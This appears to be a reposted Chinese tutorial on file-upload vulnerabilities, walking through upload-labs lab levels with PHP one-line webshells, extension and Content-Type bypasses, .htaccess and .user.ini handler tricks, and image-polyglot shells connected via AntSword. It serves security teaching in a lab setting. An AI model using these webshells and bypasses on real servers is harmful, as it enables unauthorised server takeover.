WEB入门——文件上传漏洞

这篇具有很好参考价值的文章主要介绍了WEB入门——文件上传漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、文件上传漏洞

文件上传漏洞服务端代码未对客户端上传的文件进行严格的验证,导致漏洞。非法用户可以利用上传的恶意文件控制整个网站,这个恶意文件被称为 WebShell ,也可以称为一种网页后门。

1.1常见的WebShell有哪些?

  • 拥有较完整功能的webshell,我们一般称为大马。
  • 功能简易的webshell称为小马。
  • 除此之外还存在一句话木马、菜刀马、脱库马等等的名词,是对于webShell功能或者特性的简称。

1.2 一句话木马演示

<?php eval(%_POST['data']);?> #一句话源代码
  • 将上面代码保持为hello.php并将他放在下面目录中:
    htaccess文件上传漏洞,CTF入门,前端,php,服务器
  • 使用WebShell管理工具,创建连接并连接它:
    htaccess文件上传漏洞,CTF入门,前端,php,服务器
  • 连接成功后就可以查看服务器目录了。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器

1.2 文件上传漏洞可以利用需满足三个条件

  1. 文件可上传
  2. 上传文件可已被web容器解释执行
  3. .上传路径可知

1.3 文件上传导致的危害

1、上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,脚本语言执行。
2、上传文件是Flash的策略文件crossdomain.xml,黑客用以
控制Flash在该域下的行为(其他通过类似方式控制策略文件的情况类似)。 3、上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行。
4、上传文件是钓鱼图片或者包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。
5、上传文件作为一个入口,溢出服务器的后台处理程序,如图片解析模块。
6、上传一个合法的文本文件,但是其内容是php脚本,通过文件包含使这个文本文件以脚本格式执行。可查看服务器目录,服务器中的文件,执行系统命令、代码等。

二、常用工具

2.1 搭建upload-labs环境

下载:https://github.com/c0ny1/upload-labs

2.2 工具准备

  • 中国蚁剑(AntSword)
  • 哥斯拉

三、文件上传绕过

3.1 客户端绕过

如果客户端JS脚本有加限制(例如上传图片,JS脚本显示了只能上传图片格式,不能上传.php后缀的文件)。

3.1.1 实战练习 :upload-labs/Pass-01/

  • 上传文件源码:

    <?php eval(%_POST['data']);?> 
    

    htaccess文件上传漏洞,CTF入门,前端,php,服务器

  • 直接上传一个一句话木马文件,弹窗提示:该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.pHp

  • 查看源码:知道只是在客户端用JS做了过滤限制。

    <script type="text/javascript">
        function checkFile() {
            var file = document.getElementsByName('upload_file')[0].value;
            if (file == null || file == "") {
                alert("请选择要上传的文件!");
                return false;
            }
            //定义允许上传的文件类型
            var allow_ext = ".jpg|.png|.gif";
            //提取上传文件的类型
            var ext_name = file.substring(file.lastIndexOf("."));
            //判断上传文件类型是否允许上传
            if (allow_ext.indexOf(ext_name) == -1) {
                var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
                alert(errMsg);
                return false;
            }
        }
    </script>
    
  • 解决办法:

    • 先将一句话木马文件hello.php修改后缀变成hello.png.。
    • 使用BurpSuite工具拦截上传请求。
    • 将请求里面的hello.png修改成hello.php,然后放行请求。
      htaccess文件上传漏洞,CTF入门,前端,php,服务器
  • 最后上传成功后回显,并可以查看到上传文件的地址。最后使用AntSword工具创建连接,就可以直接访问服务器。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器

3.2 服务器端文件类型检查

服务器在后台对上传文件的Content-Type进行了检查。发现如果不是运行上传范围内的content-Type类型就拒绝上传。

3.2.1 实战练习 :upload-labs/Pass-02/

  • 绕过步骤:
    • 上传hello.php,使用BurpSuite拦截请求。
    • 将请求里面的Content-Type内容进行修改,如image/png、image/jpeg等等。 然后放行
      htaccess文件上传漏洞,CTF入门,前端,php,服务器

3.3 文件后缀绕过

一些WAF对文件后缀进行了限制。

3.3.1 只限制了少量后缀情况

如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。
其中.phtml、.pht后缀的内容可以写成这样:

<script language="php"> eval($_POST['data']);</script>

3.3.2 实战练习 :upload-labs/Pass-03/

  • 上传hello.php或hello.pHp提示是不允许上传的类型
    htaccess文件上传漏洞,CTF入门,前端,php,服务器
  • 修改后缀为**.php3**,则上传成功。最后可以使用Antsword这类工具进行连接,登录到服务器端。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器
  • 题目的PHP代码如下:
    htaccess文件上传漏洞,CTF入门,前端,php,服务器

3.3.3 大量的文件后缀被限制

  • 除了限制 ‘.asp’,‘.aspx’,‘.php’,‘.jsp’ 以外 .php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀 也都被限制列。
  • 这个时候如果是apache服务器,可以尝试上传 .htaccess后缀文件。文件内容为:
    <FilesMatch "png">
    setHandler appliaction/x-httpd-php
    </FileMatch>
    
  • 该文件上传后,所在目录中名字包含png的文件将会被当做php代码解析。

3.3.4 实战练习 :upload-labs/Pass-04/

  • 题目源码:

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);//删除文件名末尾的点
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext); //转换为小写
            $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
            $file_ext = trim($file_ext); //收尾去空
    
            if (!in_array($file_ext, $deny_ext)) {
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
                if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
                } else {
                    $msg = '上传出错!';
                }
            } else {
                $msg = '此文件不允许上传!';
            }
        } else {
            $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
        }
    }
    
  • 通过源码可以知道后台过滤大量的后缀名。

    • 将WebShell文件修改成后缀为 .png
    • 上传 .htaccess 文件。
  • 上传WebShell文件成功后,将文件地址保存,方便后续AntSword连接。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器

  • 上传 .htaccess 文件

  • 使用AntSword通过WebShell路径连接。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器

3.4 图片马绕过

服务器在后台使用函数来判断上传的文件内容是否为图片。所以如果是WebShell文件仅仅是修改了后缀,可能会被pass掉。所以,我们上传的内容必须得有真实的图片内容。

  • 题目源码:使用getimagesize函数对上传文件的内容进行判断。

    function isImage($filename){
        $types = '.jpeg|.png|.gif';
        if(file_exists($filename)){
            $info = getimagesize($filename);
            $ext = image_type_to_extension($info[2]);
            if(stripos($types,$ext)>=0){
                return $ext;
            }else{
                return false;
            }
        }else{
            return false;
        }
    }
    
  • 解决办法:

    • 将一张正常的图片与WebShell文件合并成一张图片。
    • 使用CMD的copy /b命令进行合并。
      D:\文件上传>copy /b hi.png+hello.php hi_hello.png
      hi.png
      hello.pHp
      已复制         1 个文件。
      

htaccess文件上传漏洞,CTF入门,前端,php,服务器

3.4.1 实战练习 :upload-labs/Pass-14/

  • 上传WebShell文件,并把后缀改成 .png 但是内容还是一句话木马,上传失败。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器
  • 上传刚刚合成的hi_hello.png。提示上传成功,并回显了图片。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器
  • 这里上传了图片马,但是服务器过滤了.htaccess文件的上传,为了测试图片马的正常运行,留了文件包含漏洞。利用该漏洞可以查看到图片马正常运行。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器
    htaccess文件上传漏洞,CTF入门,前端,php,服务器

3.5 .user.ini 绕过

自 PHP 5.3.0 起,PHP支持基于每个目录的INI文件配置( .user.ini )。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。

  • 用法:
    .user.ini中两个中的配置就是auto_prepend_fileauto_append_file。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。这两个设置的区别:

    • auto_prepend_file是在文件前插入
    • auto_append_file在文件最后插入
  • 语法:`

    auto_append_file=hello.png
    or
    auto_prepend_file=hello.png
    

3.5.1 练习

因为upload-labs默认配置是apache+php 不是CGI/FastCGI方式,所以用phpstudy自己搭建一个简单练习环境。

  • 在根目录下创建upload文件夹,并在文件夹中添加hello.php和.user.ini、hello.png(hello.png内容为一句话木马)

  • hello.php 内容:

    <?php echo "hello";?>
    
  • user.ini 内容:

    auto_append_file=hello.png
    
  • 使用AntSword工具连接测试成功,可以入侵服务器。
    htaccess文件上传漏洞,CTF入门,前端,php,服务器

3.5.2 当服务器对.user.ini内容检测时

  • .user.ini 前面添加以下内容:

    GIF89
    auto_append_file=hello.png
    
  • 或者

    #define width 100
    #define heigh 100
    auto_append_file=hello.png
    

continue…文章来源地址https://www.toymoban.com/news/detail-736864.html

到了这里,关于WEB入门——文件上传漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CTFhub-文件上传-.htaccess

    首先上传 .htaccess 的文件 .htaccess SetHandler application/x-httpd-php 这段内容的作用是使所有的文件都会被解析为php文件 然后上传1.jpg 的文件   内容为一句话木马 1.jpg ?php echo \\\"PHP Loaded\\\"; eval(@$_POST[\\\'a\\\']); ? 用蚁剑连接 http://challenge-e3884f63b3d65683.sandbox.ctfhub.com:10800/upload/1.jpg

    2024年02月10日
    浏览(35)
  • PHP文件上传漏洞原理以及防御姿势

    0x00 漏洞描述 ​ 在实际开发过程中文件上传的功能时十分常见的,比如博客系统用户需要文件上传功能来上传自己的头像,写博客时需要上传图片来丰富自己的文章,购物系统在识图搜索时也需要上传图片等,文件上传功能固然重要,但是如果在实现相应功能时没有注意安全

    2024年02月02日
    浏览(80)
  • php中项目目录下.htaccess文件讲解

    在PHP项目目录中,.htaccess是一个配置文件,它用于配置Web服务器的行为。它通常用于Apache服务器,用于修改网站的URL结构、重定向、访问权限控制等。 下面是一些.htaccess文件的常见用法: 重定向URL:可以使用.htaccess文件将一个URL重定向到另一个URL。例如,你可以将旧的URL重

    2024年01月18日
    浏览(43)
  • 文件上传 .htaccess 与.user.ini

    1使用方法,上传.htaccess文件内容如下 或者 2再上传shell.jpg 3访问shell.jpg文件 方式使用限制,在上传的目录中必须包含php文件,例如index.php 1上传.user.ini文件,内容为: 加载1.gif文件 2上传1.gif文件 3 访问同目录中的php文件,例如index.php ,先通过本目录中的配置文件.user.ini进行

    2024年02月09日
    浏览(42)
  • 锐捷NBR路由器fileupload.php任意文件上传漏洞

    锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是\\\"Next-Generation Broadband Router\\\"的缩写,意为\\\"下一代宽带路由器\\\"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,

    2024年02月08日
    浏览(43)
  • 【Web安全】文件上传漏洞

    目录 1. 文件上传漏洞概述 1.1 FCKEditor文件上传漏洞 1.2 绕过文件上传检查功能 2. 功能还是漏洞 2.1 Apache文件解析 2.2 IIS文件解析 2.3 PHP CGI路径解析 2.4 利用上传文件钓鱼  3. 设计安全的文件上传功能 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了

    2024年02月08日
    浏览(62)
  • Web木马与文件上传漏洞

    目录 一、认识Web木马 1.1 木马概念 1.2 web木马危害 1.2.1 攻击者留后门 1.2.2 文件、数据库操作 1.2.3 修改web页面 1.3 Web 木马特点 1.3.1 Web木马可大可小 1.3.2 无法有效隐藏 1.3.3 具有明显特征值 1.3.4 必须为可执行的网页格式: 1.4 Web木马分类 1.4.1 一句话木马 1.4.2 大马小马 二、初识文

    2024年02月11日
    浏览(34)
  • Web安全漏洞介绍及防御-文件上传漏洞

    🐳博客主页:举杯同庆 – 生命不息,折腾不止 🌐订阅专栏:『Web安全』 📰如觉得博主文章写的不错,或对你有所帮助的话,请多多支持呀! 👉关注✨、点赞👍、收藏📂、评论。 话题讨论 中国经济周刊-2022-07-08 新闻 万豪国际集团证实了近期一起数据泄露事件,一个月

    2024年02月02日
    浏览(43)
  • Web 安全之文件上传漏洞详解

    目录 文件上传漏洞的类型 文件上传的攻击方式 文件上传漏洞影响 防护措施 小结 文件上传漏洞是网络安全中的常见问题,通常发生在网站或应用程序允许用户上传文件到服务器的场景。这类漏洞如果被攻击者利用,可能导致数据泄露、非法文件分发、服务器入侵甚至整个系

    2024年02月04日
    浏览(41)
  • Web安全之文件上传漏洞详解

    文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致

    2024年02月13日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包